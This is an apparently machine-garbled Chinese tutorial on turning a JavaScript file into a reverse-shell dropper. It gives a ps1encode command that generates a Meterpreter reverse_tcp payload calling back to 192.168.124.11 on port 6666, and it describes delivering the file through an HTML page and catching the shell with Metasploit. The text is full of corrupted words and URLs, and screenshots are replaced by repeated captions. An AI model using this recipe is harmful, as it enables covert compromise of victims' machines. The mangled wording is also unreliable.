利用前端JS文件反弹shell

前三天在freebuf上见到一个利用Ink文档促发进攻链的文章，的确钦佩创作者的脑洞大开。

htpp://www.freebuf.Com/articles/system/207109.hmtl

    网络时代无奇不有,多样式留后门,促发条件上升shell.操作够骚硬道理。

0x01:过程

一、利用工具

ActionScript

htpp://github.Com/CroweCybersecurity/ps1encode

二、环境配备

    它有很各种添加方式，敬请移步gayhub上查看

    今天利用添加的Js文档来上升shell

利用Js文档上升shell

ActionScript

指令：./ps1encode.rb--LHOST 192.168.124.11 --LPORT 6666 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t Js

利用此指令添加Js文档

利用Js文档上升shell

    emmm!编码很长，自己拷贝出来放进txt编辑器里。

并重取名为1.Js(文件夹名称随意)。

利用Js文档上升shell

    单是放一个Js太有界了。实际环境下可以配合hmtl进行启用Js文档实行。

利用Js文档上升shell

    我简单的写了一个hmtl来启用Js文档

当然你也可以 一个Js就上升

利用Js文档上升shell

准备好msf回弹力的环境

实行exploit 等着监视实行

三、实行效果

利用Js文档上升shell

设计效果图

视频设计效果图

0x02:后话

    也许我的过程会出现错误、也许我的看法会出现错误。但是我的构思是人烟稀少的。我每一次写的文章想体现不是炫技，我跟每位比，我还是中学生，我也是小菜鸟。我要体现的是构思。如果之后有体现不清楚的，造成您的提出质疑，您可以跟我说，或者搜索引擎。